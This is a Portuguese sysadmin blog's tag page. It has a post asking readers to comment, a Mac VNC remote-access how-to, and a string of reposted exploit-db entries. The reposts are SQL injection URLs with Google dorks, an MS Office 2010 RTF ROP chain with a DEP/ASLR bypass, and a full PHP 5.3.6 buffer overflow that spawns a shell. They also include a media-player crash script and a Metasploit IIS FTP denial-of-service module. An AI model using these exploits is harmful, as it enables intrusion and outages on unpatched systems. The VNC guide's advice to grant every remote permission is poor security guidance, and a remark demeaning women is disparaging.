Browsed by
Tag: windows

A importância dos comentários para um Blogueiro

A importância dos comentários para um Blogueiro

Hoje, saindo um pouco dos universo das dicas e dos how-tos venho falar hoje da importância dos leitores comentarem no BLOG… Um comentário as vezes é um agravante para um decisão por exemplo de continuar ou não um BLOG, sempre que recebo um comentário dizendo que deu certo, salvou minha, meu cachorro não morreu por causa do seu artigo… isso me deixa imensamente satisfeito… com o appunix não é diferente… temos vários leitores que fazem questão de comentar, deixar bem claro que a informação encontrada aqui no BLOG fez a diferença… galera isso é um Termômetro para qualquer Blogueiro, o comentário de cada leitor é como uma injeção de ânimo, críticas também são bem vindas… o que faz a excelência de um BLOG são os comentários…. tenho visto um aumento assombroso nos acessos ao appunix, mas não vejo isso em questão dos comentários…. Não custa nada, galera, se ajudou a resolver seu problema ou te ensinou algo insteressante… Tire, sei lá… 30 segundos do seu precioso tempo e poste um comentário… isso é muito importante pra gente.

Não sei se já perceberam, mas appunix.com.br é um projeto feito por mim Douglas @doooooguinha e João Paulo @little_oak , temos muita coisa pra passar a vocês… as vezes deixamos de postar alguma solução que temos em mãos por falta de motivação… como a vida de todo SysAdmin não temo muito tempo… então tiramos do momento em que estamos com nossas esposas @sabrinacpsantos e @katyanne_moura pra deixar as coisas mais fáceis pra vocês…. tenho certeza também que já estamos sendo plagiados, já vimos por aí BLOGS que somente alteram nossos textos e nem se quer dão ao luxo de no dar os créditos…  Isso é Plágio, Incompetência e principalmente egoísmo, amigos… Não tem como fazer seu BLOG crescer postando somente conteúdo dos outros… mesmo que você não queira dar créditos, é necessário!

Não quero nosso BLOG também fique cheio de comentário inúteis, tipo (lol ou \o/, isso é legal quando se tem um contexto… somente isso, podem simplismente não comentar que fica melhor) queremos algo para nos deixar a par de como está o conteúdo do BLOG, quem é BLOGUEIRO e acompanha o app sabe, a cada dia vamos postando soluções INÉDITAS… nosso conteúdo é escrito pensando em leitores leigos, a até Sysadmins avançados… de forma que tanto um quanto ourto sintam-se confortáveis em ler nossos textos… tentamos ao máximo não escrever artigos técnicos, acreditamos que isso afasta o leitor da realidade computacional (que na minha humilde opinião só perde em complexidade para MULHERES).

Nosso conteúdo é escrito por quem vivem de perto problemas e encontra soluções, Little_oak por exemplo é um grande Doutor na tangente de Software Livre, Hosting (prestanto serviço para os maiores fornecedores de dedicados), PHP  e agora Mac OS/Hackintosh …. Eu com bem menos experiência, trabalho/vivo/respiro tecnologia a mais ou menos 3 anos, com experiência em gerenciamento de servidores Linux/Windows, evangelizador Mac OS… curto e vivo Software Livre e mundo open Source…. (Apesar de ter programado em .NET… ahhh, finalmente estou liberto, concluindo minha graduação em Redes…)

Se algum de vocês que está lendo esse artigo se sente ofendido, DESCULPEM-ME, não foi essa a intensão, quero apenas deixar claro que escrevemos conteúdo de qualidade, mas que queremos ter um termômetro disso na parte de comentários. Nada melhor que deixar uma posição a quem nos ajudou a resolver algum problema… Obrigado por ajudarem esse BLOG crescer a cada dia.

Forte abraço amigos… :D

Como conectar no Mac os X Snow leopard | Lion via Remote Desktop

Como conectar no Mac os X Snow leopard | Lion via Remote Desktop

Bom, galera, nós do 4ppun1x conectamos remotamente neste bsd maravilhoso que é o mac afim de que pudéssemos fazer ajustes remotos em nosso pc. Este how to resume-se em habilitar o suporte VNC do mac juntamente com uma senha de segurança para que nosso mac fique tranquilo e seguro para aceitar conexões de rede sem qualquer stress.
Estamos usando o mac os x Snow Leopard (mas funciona no mac os x lion), assim como uma conexão comum (feita de um router wireless) e usando Windows (ops, ruindows) seven e o cliente vnc TightVNC (mostraremos o link de download), que além de free atende bem pra caramba.
Bora simbora e deixar de balela?

Primeiro devemos adentrar nas preferências do sistema afim de irmos aos menus principais de configurações do mac, acompanhe o print:

Clicando no menu de preferências do mac
Clicando no menu de preferências do mac

Agora iremos clicar no menu de preferências:

menus principais SHARING
menus principais SHARING

Pronto, devemos ir na área de Sharing (ali liberamos apache, acesso remoto, compartilhamento de arquivos e etc):

Marcando acesso remoto
Marcando acesso remoto

Assim que marcamos a opção REMOTE MANAGEMENT o menu do print acima é exibido.

Iremos comentar cada opção marcada:

1 – Observe (modo de observação), marcamos o control para permitir controle por parte do acesso remoto (neste caso nosso pc Window$ 7), A opção de mostrar quando há alguém observando o pc é bom de estar marcada (é, meu amigo, alguém dentro e você sem saber é osso né?),

2 – Generate Reports é bom estar marcado pois gera logs (vai que alguém faz besteira?),

3 – Open and Quit app… Deixa marcado, afinal de contas isto habilita o suporte para o cliente remoto poder executar aplicativos,

4 – Change Settings, bem, em um caso de setup, por que não deixar ativo? Vale a pena sim! Se você precisar de um ajuste aqui ou ali deve ter isto ON.

5 – Delete e replace items é bom, afinal de contas direito de escrever, ler e executar, para acesso remoto é quase um padrão.

6 – Start text… é bom quando se quer trocar idéia com o cliente remoto, deixamos on.

7 – Restart and Shutdown, meu amigo, se alguém precisa aplicar mudanças críticas e positivas em seu Mac Os X, por que não deixar este recurso para o acesso remoto? Se achar inviável que alguém remotamente desligue seu apple, deixe isto desmarcado.

8 – Suporte a cópia de itens é bom ;), deixe on.

Assim que damos ok é solicitada autorização do user afim de que seja validada a mudança, mas para que isto ocorra de verdade devemos clicar na opção COMPUTER SETTINGS para poder deixar a coisa no ponto (é aqui que aplicamos a senha de acesso remoto, afinal de contas deixar um mac com todos os recursos globais e ainda deixar sem senha é tiro de calibre 12 no próprio pé, né?

Aplicando senha e confirmando
Aplicando senha e confirmando

Deixe em vnc viewers a senha (coloque algo usando caracteres especiais para dificultar a vida dos lamers, use #$%&*@./<> com caracteres de senha).

Assim que aplicar você precisará confirmar usando sua senha de usuário do sistema, confirme com sua senha (vide print a seguir):

Confirmar senha no Mac Os X
Confirmar senha no Mac Os X

Pode ser que nós (appunix e você), algum dia, nesta vida de trabalhador braçal, possamos nos perguntar?

Como descubro meu ip nesse danado desse mac?

Relaxa, lembra do esquema de Central das preferências do mac? Então, a gente confirmar o Sharing e volta lá, no menu networking, ou seja: Preferências do Sistema-> Network.

Veja o ícone no MEIO da central de preferências:

Centralizador de Preferências do Mac Os X
Centralizador de Preferências do Mac Os X

Pronto, depois é só clicar em Redes (Network) e meter bala, veja o danado do IP no MEIO da nova tela:

Olha o ipzão aí gente
Olha o ipzão aí gente

 

Pronto, já temos o ip em mãos, no meu caso a terminação é 104. O que devemos fazer?

No Microsoft Windows 7 devemos baixar o cliente VNC Free, para isso acesse o linkÇ

http://www.tightvnc.com/download/1.3.10/tightvnc-1.3.10-setup.exe

Baixe o cliente e em seguida abra-o.

Assim que executar o tightvnc você vai ver a seguinte tela:

cliente VNC
cliente VNC

Assim que confirmar o acesso ele vai mostrar uma tela requisitando senha, igual essa aqui ó:

senha VNC
senha VNC

Confirme com aquela senha que você definiu nas propriedades de acesso remoto de seu macosx e FINISH!

 

Curtiu?

Curtimos também.
Abraços a todos e obrigado pela visita!

DmxReady Bilboard v1.2 SQL Injection Vulnerability

DmxReady Bilboard v1.2 SQL Injection Vulnerability

# Exploit Title: DmxReady Bilboard v1.2 SQL Injection Vulnerability
# Google Dork: inurl:inc_billboardmanager_summary_popup.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link:
http://www.dmxready.com/?product=billboard-manager
# Version: v1.2
#Language: ASP
# Price : $99.97
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members....
----------------------------------------------------------------------------------------------------
Bug;

http://target/path/admin/BillboardManager/update.asp?ItemID=xx [ SQL ATTACK]

Fonte: http://www.exploit-db.com/exploits/17481/

DmxReady Document Library Manager v1.2 SQL Injection Vulnerability

DmxReady Document Library Manager v1.2 SQL Injection Vulnerability

# Exploit Title: DmxReady Document Library Manager v1.2 SQL Injection
Vulnerability
# Google Dork: inurl:inc_documentlibrarymanager.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link:
http://www.dmxready.com/?product=document-library-manager
# Version: v1.2
#Language: ASP
# Price : $99.97
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members....

----------------------------------------------------------------------------------------------------
Bug;

http://target/path/admin/DocumentLibraryManager/update.asp?ItemID=xx [ SQL ATTACK]

Fonte: http://www.exploit-db.com/exploits/17482/

DMXReady Account List Manager v1.2 SQL Injection Vulnerability

DMXReady Account List Manager v1.2 SQL Injection Vulnerability

# Exploit Title: DMXReady Account List Manager v1.2 SQL Injection
Vulnerability
# Google Dork: inurl:inc_billboardmanager_summary_popup.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link:
http://www.dmxready.com/?product=account-list-manager
# Version: v1.2
#Language: ASP
# Price : $99.97
#Demo :
http://demo.dmxready.com/applications/AccountListManager/inc_accountlistmanager.asp
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members....
---------------------------------------------------------------------------------------------------
Bug;

http://target/path/admin/AccountListManager/update.asp?AccountID=xx [ SQL ATTACK]

Fonte: http://www.exploit-db.com/exploits/17483/

DmxReady Links Manager v1.2 SQL Injection Vulnerability

DmxReady Links Manager v1.2 SQL Injection Vulnerability

# Exploit Title: DmxReady Links Manager v1.2 SQL Injection Vulnerability
# Google Dork: inurl:inc_linksmanager.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link:
http://www.dmxready.com/?product=links-manager
# Version: v1.2
#Language: ASP
# Price : $99.97
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members….
————————————————————————————————————
Bug;

http://target/path/admin/LinksManager/update.asp?ItemID=xx [ SQL ATTACK]

Fonte: http://www.exploit-db.com/exploits/17484/

MS Office 2010 RTF Header Stack Overflow Vulnerability Exploit

MS Office 2010 RTF Header Stack Overflow Vulnerability Exploit

# Exploit Title: MS Office 2010 RTF Header Stack Overflow Vulnerability
Exploit
# Date: 7/3/2011
# Author: Snake ( Shahriyar.j < at > gmail )
# Version: MS Office <= 2010
# Tested on: MS Office 2010 ( 14.0.4734.1000) - Windows 7
# CVE : CVE-2010-3333

# This is the exploit I wrote for Abysssec "The Arashi" article.
# It gracefully bypass DEP/ASLR in MS Office 2010,
# and we named this method "Ikazuchi DEP/ASRL Bypass" : >
# unfortunately msgr3en.dll loads a few seconds after opining office,
# so just need to open open Office , and then open exploit after a few
second and saw a nice calc.
#
# The Arashi : http://abysssec.com/files/The_Arashi.pdf
http://www.exploit-db.com/download_pdf/17469

# me : twitter.com/ponez
# aslo check here for Persian docs of this methods and more :
http://www.0days.ir/article/

Exploit: http://www.exploit-db.com/sploits/cve-2011-3333_exploit.doc

#
# and the Rop :

3F2CB9E0 POP ECX
RETN
# HeapCreate() IAT = 3F10115C

3F389CA5 MOV EAX,DWORD PTR DS:[ECX]
RETN
# EAX == HeapCreate() Address

3F39AFCF CALL EAX
RETN
# Call HeapCreate() and Create a Executable Heap :D
# after this call, EAX contain our Heap Address.

0x3F2CB9E0 POP ECX
RETN
# pop 0x00008000 into ECX

0x3F39CB46 ADD EAX,ECX
POP ESI
RETN
# add ECX to EAX and instead of calling HeapAlloc,
# now EAX point to the RWX Heap :D

0x3F2CB9E0 POP ECX
RETN
# pop 0x3F3B3DC0 into ECX, it is a writable address.

0x3F2233CC MOV DWORD PTR DS:[ECX],EAX
RETN
# storing our RWX Heap Address into 0x3F3B3DC0 ( ECX ) for
further use ;)

0x3F2D59DF POP EAX
ADD DWORD PTR DS:[EAX],ESP
RETN
# pop 0x3F3B3DC4 into EAX , it is writable address with zero!
# then we add ESP to the Zero which result in storing ESP into
that address,
# we need ESP address for copying shellcode ( which stores in
Stack ),
# and we have to get it dynamically at run-time, now with my
tricky instruction, we have it!

0x3F2F18CC POP EAX
RETN
# pop 0x3F3B3DC4 ( ESP address ) into EAX

0x3F2B745E MOV ECX,DWORD PTR DS:[EAX]
RETN
# now ECX point to nearly offset of Stack.

0x3F39795E POP EDX
RETN
# pop 0x00000024 into EDX

0x3F39CB44 ADD ECX,EDX
ADD EAX,ECX
POP ESI
RETN
# add 0x24 to ECX ( Stack address )

0x3F398267 MOV EAX,ECX
RETN
# EAX = ECX ; )

0x3F3A16DE MOV DWORD PTR DS:[ECX],EAX
XOR EAX,EAX
POP ESI
RETN
# mov EAX ( Stack Address + 24 = Current ESP value ) into the
current Stack Location,
# and the popping it into ESI ! now ESI point where shellcode
stores in stack :D

0x3F398267 MOV EAX,ECX
RETN
# EAX = ECX ; )

3F2CB9E0 POP ECX
RETN
# pop 0x3F3B3DC0 ( Saved Heap address ) into ECX

0x3F389CA5 MOV EAX,DWORD PTR DS:[ECX]
RETN
# now EAX point to our RWX Heap

0x3F2B0A7C XCHG EAX,EDI
RETN 4
# EDI = Our RWX Heap Address

3F2CB9E0 POP ECX
RETN
# pop 0x3F3B3DC0 ( Saved Heap address ) into ECX

0x3F389CA5 MOV EAX,DWORD PTR DS:[ECX]
RETN
# now EAX point to our RWX Heap

0x3F38BEFB ADD AL,58
RETN
# just skip some junks ; )

3F2CB9E0 POP ECX
RETN
# pop 0x00000080 into ECX ( 0x80 * 4 = 0x200 = Copy lent )

3F3441B4 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
POP EDI
POP ESI
RETN
# Copy shellcode from stack into RWX Heap

3F39AFCF CALL EAX
RETN
# KABOOM !!!

Exploit: http://www.exploit-db.com/sploits/cve-2011-3333_exploit.doc

Fonte: http://www.exploit-db.com/exploits/17474/

PHP 5.3.6 Buffer Overflow PoC (ROP) CVE-2011-1938

PHP 5.3.6 Buffer Overflow PoC (ROP) CVE-2011-1938

/*
** Jonathan Salwan - @shell_storm
** http://shell-storm.org
** 2011-06-04
**
** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1938
**
** Stack-based buffer overflow in the socket_connect function in ext/sockets/sockets.c
** in PHP 5.3.3 through 5.3.6 might allow context-dependent attackers to execute arbitrary
** code via a long pathname for a UNIX socket.
*/

echo "[+] PHP 5.3.6 Buffer Overflow PoC (ROP)\n";
echo "[+] CVE-2011-1938\n\n";

# Gadgets in /usr/bin/php
define('DUMMY', "\x42\x42\x42\x42"); // padding
define('STACK', "\x20\xba\x74\x08"); // .data 0x46a0 0x874ba20
define('STACK4', "\x24\xba\x74\x08"); // STACK + 4
define('STACK8', "\x28\xba\x74\x08"); // STACK + 8
define('STACK12', "\x3c\xba\x74\x08"); // STACK + 12
define('INT_80', "\x27\xb6\x07\x08"); // 0x0807b627: int $0x80
define('INC_EAX', "\x66\x50\x0f\x08"); // 0x080f5066: inc %eax | ret
define('XOR_EAX', "\x60\xb4\x09\x08"); // 0x0809b460: xor %eax,%eax | ret
define('MOV_A_D', "\x84\x3e\x12\x08"); // 0x08123e84: mov %eax,(%edx) | ret
define('POP_EBP', "\xc7\x48\x06\x08"); // 0x080648c7: pop %ebp | ret
define('MOV_B_A', "\x18\x45\x06\x08"); // 0x08064518: mov %ebp,%eax | pop %ebx | pop %esi | pop %edi | pop %ebp | ret
define('MOV_DI_DX', "\x20\x26\x07\x08"); // 0x08072620: mov %edi,%edx | pop %esi | pop %edi | pop %ebp | ret
define('POP_EDI', "\x23\x26\x07\x08"); // 0x08072623: pop %edi | pop %ebp | ret
define('POP_EBX', "\x0f\x4d\x21\x08"); // 0x08214d0f: pop %ebx | pop %esi | pop %edi | pop %ebp | ret
define('XOR_ECX', "\xe3\x3b\x1f\x08"); // 0x081f3be3: xor %ecx,%ecx | pop %ebx | mov %ecx,%eax | pop %esi | pop %edi | pop %ebp | ret

$padd = str_repeat("A", 196);

$payload = POP_EDI. // pop %edi
STACK. // 0x874ba20
DUMMY. // pop %ebp
MOV_DI_DX. // mov %edi,%edx
DUMMY. // pop %esi
DUMMY. // pop %edi
"//bi". // pop %ebp
MOV_B_A. // mov %ebp,%eax
DUMMY. // pop %ebx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
MOV_A_D. // mov %eax,(%edx)
POP_EDI. // pop %edi
STACK4. // 0x874ba24
DUMMY. // pop %ebp
MOV_DI_DX. // mov %edi,%edx
DUMMY. // pop %esi
DUMMY. // pop %edi
"n/sh". // pop %ebp
MOV_B_A. // mov %ebp,%eax
DUMMY. // pop %ebx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
MOV_A_D. // mov %eax,(%edx)
POP_EDI. // pop %edi
STACK8. // 0x874ba28
DUMMY. // pop %ebp
MOV_DI_DX. // mov %edi,%edx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
XOR_EAX. // xor %eax,%eax
MOV_A_D. // mov %eax,(%edx)
XOR_ECX. // xor %ecx,%ecx
DUMMY. // pop %ebx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
POP_EBX. // pop %ebx
STACK. // 0x874ba20
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
XOR_EAX. // xor %eax,%eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INT_80; // int $0x80

$evil = $padd.$payload;

$fd = socket_create(AF_UNIX, SOCK_STREAM, 1);
$ret = socket_connect($fd, $evil);
?>

Fonte: http://www.exploit-db.com/exploits/17486/

Donar Player 2.8.0 Denial of Service Vulnerability

Donar Player 2.8.0 Denial of Service Vulnerability

# ########################################
# Title : Donar Player 2.8.0 Denial of Service
# Software link : http://www.donarzone.com/downloads/donar-player-setup-free.exe , http://www.donarzone.com/donar-player
# Version : 2.8.0
# Tested on : Windows XP SP3 English
# Date : 3/07/2011
# Author : X-h4ck
# Website : http://www.pirate.al , # PirateAL Crew @2011 , http://theflashcrew.blogspot.com
# Email : [email protected]
# Greetz : Wulns~ - IllyrianWarrior - Danzel - Ace - M4yh3m - Saldeath - bi0 - Slimshaddy - d3trimentaL - Lekosta
# ########################################

#!/usr/bin/python

filename = "crash.wma"

junk = "\x41" * 1337

FILE = open(filename, "w")
FILE.write(junk)
FILE.close()
print " Open", filename, "on Donar Player and play it.. (the application will Crash)"
print " PirateAL Crew"

Fonte: http://www.exploit-db.com/exploits/17471/

Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS [MS09-053]

Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS [MS09-053]

# Exploit Title: [MS09-053] Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS
# Date: Jul 03, 2011
# Author: Myo Soe
# Software Link: http://www.microsoft.com/
# Version: 5.0 - 7.0
# Tested on: unpatched version of windows xp & 2k3

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Dos

def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft IIS FTP Server <= 7.0 LIST Stack Exhaustion Denial of Service',
'Description' => %q{
This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. This exploit is especially meant for the service which is configured as "manual" mode in startup type.
},
'Author' => [
'Nikolaos "Kingcope" Rangos', # Bug Discoverer
'Myo Soe ' # Metasploit Module
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 1.0 $',
'References' =>
[
[ 'CVE', '2009-2521'],
[ 'BID', '36273'],
[ 'OSVDB', '57753'],
[ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],
[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']

],
'DisclosureDate' => 'Sep 03 2009'))

register_options([
OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),
OptString.new('FTPPASS', [ true, 'Valid FTP password for username', '[email protected]' ])
])
end

def run

return unless connect_login

print_status("Sending DoS packets ...")

send_cmd_data(['ls','-R */../'],nil)

disconnect

print_good("Done")

end
end

Fonte: http://www.exploit-db.com/exploits/17476/